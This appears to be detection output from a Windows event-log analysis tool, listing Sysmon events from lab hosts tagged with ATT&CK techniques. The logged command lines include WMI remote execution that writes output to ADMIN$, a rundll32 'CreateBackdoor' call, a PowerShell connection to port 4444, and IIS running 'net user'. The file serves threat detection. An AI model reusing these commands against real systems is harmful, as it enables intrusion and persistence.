SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
00000000-0000-0000-0000-000000000000
612
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1,"
1
5
4
1
0
0x8000000000000000
341
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:46:43.675
747F3D96-28B3-5E1E-0000-001032047C00
1656
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"cmd.exe" /c notepad.exe
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-28B3-5E1E-0000-002057EB7B00
0x7beb57
0
High
SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-28B3-5E1E-0000-00101DF17B00
3412
C:\Windows\System32\rundll32.exe
rundll32 url.dll,OpenURL ms-browser://
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1,"
1
5
4
1
0
0x8000000000000000
8048
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-29 20:59:21.539
365ABB72-65A9-5CC7-0000-00104E5C2400
3376
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Users\IEUser\Desktop\invoke-pipeshell-master\
IEWIN7\IEUser
365ABB72-5B3A-5CC7-0000-002096080100
0x10896
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-6231-5CC7-0000-00104CF71800
3940
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"
1
5
4
1
0
0x8000000000000000
578505
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-04-20 20:33:14.246
747F3D96-3A8A-607F-0000-0010E4717700
5280
C:\Windows\System32\svchost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Windows\system32\
NT AUTHORITY\LOCAL SERVICE
747F3D96-82AF-607F-0000-0020E5030000
0x3e5
0
System
SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
00000000-0000-0000-0000-000000000000
612
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
342407
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:05:16.721
747F3D96-E90C-5F33-0000-0010CB420200
3320
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-E909-5F33-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E909-5F33-0000-00108C580000
612
C:\Windows\System32\services.exe
C:\Windows\system32\services.exe
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ),1,"
1
5
4
1
0
0x8000000000000000
8048
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-29 20:59:21.539
365ABB72-65A9-5CC7-0000-00104E5C2400
3376
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
C:\Users\IEUser\Desktop\invoke-pipeshell-master\
IEWIN7\IEUser
365ABB72-5B3A-5CC7-0000-002096080100
0x10896
1
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-6231-5CC7-0000-00104CF71800
3940
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9838
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:35:13.434
365ABB72-B181-5CC8-0000-0010ADBF1E00
3372
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
C:\
IEWIN7\IEUser
365ABB72-B17F-5CC8-0000-0020C6A31E00
0x1ea3c6
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B17F-5CC8-0000-001082A51E00
3572
C:\Windows\System32\mmc.exe
C:\Windows\system32\mmc.exe -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9828
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.324
365ABB72-B0F3-5CC8-0000-0010C43A1D00
2828
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9828
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.324
365ABB72-B0F3-5CC8-0000-0010C43A1D00
2828
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9828
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.324
365ABB72-B0F3-5CC8-0000-0010C43A1D00
2828
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname ( ) , IP ( 10.0.2.19 ) and port ( 4444 )",3,"
3
5
4
3
0
0x8000000000000000
9813
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:26:52.794
365ABB72-AF8C-5CC8-0000-001003361900
2484
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
NT AUTHORITY\SYSTEM
tcp
true
false
10.0.2.18
IEWIN7
49160
false
10.0.2.19
4444
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1,"
1
5
4
1
0
0x8000000000000000
340
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:46:43.232
747F3D96-28B3-5E1E-0000-00101DF17B00
3412
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,OpenURL ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-28B3-5E1E-0000-002057EB7B00
0x7beb57
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-28B3-5E1E-0000-0010CAEC7B00
1632
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"
1
5
4
1
0
0x8000000000000000
578503
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-04-20 20:33:13.680
747F3D96-3A89-607F-0000-001028587700
4912
C:\Windows\System32\svchost.exe
10.0.17763.1 (WinBuild.160101.0800)
Host Process for Windows Services
Microsoft® Windows® Operating System
Microsoft Corporation
svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-82AE-607F-0000-0020E7030000
0x3e7
0
System
SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
00000000-0000-0000-0000-000000000000
612
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
340
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:46:43.232
747F3D96-28B3-5E1E-0000-00101DF17B00
3412
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,OpenURL ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-28B3-5E1E-0000-002057EB7B00
0x7beb57
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-28B3-5E1E-0000-0010CAEC7B00
1632
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
340
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:46:43.232
747F3D96-28B3-5E1E-0000-00101DF17B00
3412
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,OpenURL ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-28B3-5E1E-0000-002057EB7B00
0x7beb57
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-28B3-5E1E-0000-0010CAEC7B00
1632
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" ),1,"
1
5
4
1
0
0x8000000000000000
342406
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-08-12 13:05:14.798
747F3D96-E90A-5F33-0000-0010863C0100
1740
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat""
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-E909-5F33-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-E90A-5F33-0000-00102CF20000
1180
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243562
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.488
747F3D96-9F69-5E75-0000-00105B9A2000
2028
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
340
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:46:43.232
747F3D96-28B3-5E1E-0000-00101DF17B00
3412
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,OpenURL ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-28B3-5E1E-0000-002057EB7B00
0x7beb57
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-28B3-5E1E-0000-0010CAEC7B00
1632
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
1
5
4
1
0
0x8000000000000000
340
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-01-14 20:46:43.232
747F3D96-28B3-5E1E-0000-00101DF17B00
3412
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 url.dll,OpenURL ms-browser://
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-28B3-5E1E-0000-002057EB7B00
0x7beb57
0
High
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-28B3-5E1E-0000-0010CAEC7B00
1632
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243562
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.488
747F3D96-9F69-5E75-0000-00105B9A2000
2028
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( "c:\windows\system32\cmd.exe" /c net user ),1,"
1
5
4
1
0
0x8000000000000000
1044
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-24 01:33:53.112
365ABB72-4A01-5CE7-0000-0010EE9DAC00
2404
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"c:\windows\system32\cmd.exe" /c net user
c:\windows\system32\inetsrv\
IIS APPPOOL\DefaultAppPool
365ABB72-45C7-5CE7-0000-002092F99C00
0x9cf992
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-49D6-5CE7-0000-001020A7A700
2580
C:\Windows\System32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243562
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.488
747F3D96-9F69-5E75-0000-00105B9A2000
2028
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
1
5
4
1
0
0x8000000000000000
9827
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:32:51.246
365ABB72-B0F3-5CC8-0000-0010B1361D00
2504
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
C:\
IEWIN7\IEUser
365ABB72-B0F2-5CC8-0000-00203D311D00
0x1d313d
0
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-B0C0-5CC8-0000-001017C31C00
836
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" /c net user ),1,"
1
5
4
1
0
0x8000000000000000
1044
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-24 01:33:53.112
365ABB72-4A01-5CE7-0000-0010EE9DAC00
2404
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
